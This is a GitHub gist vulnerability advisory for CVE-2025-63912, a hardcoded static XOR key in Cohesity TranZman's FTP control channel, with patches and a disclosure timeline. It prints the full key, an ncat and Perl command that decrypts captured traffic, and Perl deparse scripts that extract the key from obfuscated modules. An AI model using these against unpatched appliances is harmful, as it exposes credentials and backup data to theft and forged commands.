Skip to content

Instantly share code, notes, and snippets.

@GregDurys

GregDurys/CVE-2025-63912.md

Created March 2, 2026 17:29
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save GregDurys/4c2765d76272cda64dfc78f7a75a9251 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save GregDurys/4c2765d76272cda64dfc78f7a75a9251 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-63912 - Cohesity TranZman Weak Cryptography (Static XOR)
Raw
CVE-2025-63912.md

CVE-2025-63912: Weak Cryptography in Cohesity TranZman

Overview

Field Value
CVE ID CVE-2025-63912
CVSS v3.1 5.5 (Medium)
Vector AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE CWE-327: Use of a Broken or Risky Cryptographic Algorithm
Vendor Cohesity, Inc.
Product TranZman Migration Appliance
Affected Versions Release 4.0 Build 14614 including patch TZM_1757588060_SEP2025_FULL.depot

Description

The TranZman FTP service on port 55555/TCP uses XOR with a static, hardcoded key for obfuscation. This provides no actual security as anyone with the key can decrypt all traffic.

Vendor documentation describes TranZman as a backup/transition/recovery product which commonly reads, imports and transfers backup media and files. This makes the use of an unauthenticated, malleable obfuscation layer particularly high risk for data confidentiality and integrity.

Impact

An attacker or eavesdropper who can observe the control channel or obtain the static key can:

  • Decrypt the entire control conversation (exposing credentials, filenames, commands), enabling discovery of backup file names or other sensitive resources
  • Forge or modify commands (XOR is malleable) or replay authenticated commands, allowing unauthorised retrieval or tampering of files
  • Perform actions that potentially would not be recorded due to SITE log suppression, reducing accountability and hindering incident response

Attack Vector

  1. Attacker positions themselves to capture network traffic on the network segment where TranZman operates (or obtains the static key from the appliance)
  2. Capture FTP control channel traffic on port 55555/TCP
  3. Apply XOR decryption using the static key to reveal plaintext commands
  4. Identify file transfer commands (e.g., RETR backup-2025-09-15.tar.gz)
  5. Replay or forge commands to retrieve backup files, exfiltrating sensitive data

Technical Details

The TranZman FTP daemon is launched via a Perl wrapper that loads obfuscated modules from .pmt files:

$ ps auxfww | egrep 'ftpd\.pl|perl -x'
root 456159 ... perl -x -wT /opt/SRLtzm/scripts/perl/ftpd.pl -S

The obfuscation scheme (SRLCRYPT) works as follows:

  • Fixed ASCII header SRLCRYPT followed by XOR of plaintext with a hardcoded static key embedded in code
  • No IV, no integrity check, same transform in both directions
  • The server banner arrives as SRLCRYPT... and decrypts to a standard FTP greeting (220 FTP server ready.)

Example of decrypting the FTP banner:

$ timeout 2 ncat localhost 55555 > /tmp/ftp_response.bin
$ perl -MSRCrypt::srcrypt -e \
    'local $/; print SRCrypt::srcrypt::srldecrypt(scalar <>);' \
    /tmp/ftp_response.bin
220 FTP server ready.

Commands must be sent as SRLCRYPT + XOR. Standard FTP responses are returned after decryption (e.g., 331 Username OK, 530 Not logged in).

Additional concerns:

  • The FTP server suppresses logging for lines matching SITE log ..., creating an audit blind spot
  • No TLS/FTPS on this control channel
  • Replays and bit-flips are feasible; any observer can decrypt, forge, or replay commands

Static XOR Key

The hardcoded key is a plaintext copyright string:

(C) Stone Ram Limited 2016 - empower the move with TranZman - Backup Transition Manager

This key is embedded in the SRCrypt::srcrypt module and used for both encryption and decryption (XOR is its own inverse).

Extracting the XOR Key

The .pmt modules are obfuscated on disk and the loader unlinks temp files at runtime to prevent code review. To extract the source, use B::Deparse to dump the in-memory Perl code:

# Dump the crypto module (contains the XOR key)
perl -we '
  use lib "/opt/SRLtzm/lib";
  require SRCrypt::srcrypt;
  use B::Deparse;
  my $d = B::Deparse->new("-p","-sC");
  no strict "refs";
  for my $sym (sort keys %{"SRCrypt::srcrypt::"}) {
    my $fq = "SRCrypt::srcrypt::$sym";
    my $cr = *{$fq}{CODE} or next;
    print $d->coderef2text($cr), "\n";
  }
' > /tmp/SRCrypt_srcrypt_deparsed.pl

# Dump the FTP server module (shows log suppression logic)
perl -we '
  use lib "/opt/SRLtzm/lib";
  require SRCrypt::FTPServer;
  use B::Deparse;
  my $d = B::Deparse->new("-p","-sC");
  no strict "refs";
  for my $sym (sort keys %{"SRCrypt::FTPServer::"}) {
    my $fq = "SRCrypt::FTPServer::$sym";
    my $cr = *{$fq}{CODE} or next;
    print $d->coderef2text($cr), "\n";
  }
' > /tmp/SRCrypt_FTPServer_deparsed.pl

The srcrypt module contains the srlcrypt function with the hardcoded XOR key. The FTPServer module shows the FTP command handling and log suppression logic (SITE log and PASV commands are silently dropped).

Remediation

Apply Cohesity patches in the following order:

  1. TZM_patch_1.patch
  2. TZM_1760106063_OCT2025R2_FULL.depot

Contact Cohesity support for the latest OVA version with integrated fixes.

Timeline

Date Event
26 September 2025 Reported to Cohesity
20 October 2025 Cohesity confirmed fix in patches
25 December 2025 Embargo period ended
27 December 2025 Public disclosure

Credit

Discovered by Greg Durys, LME

References

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment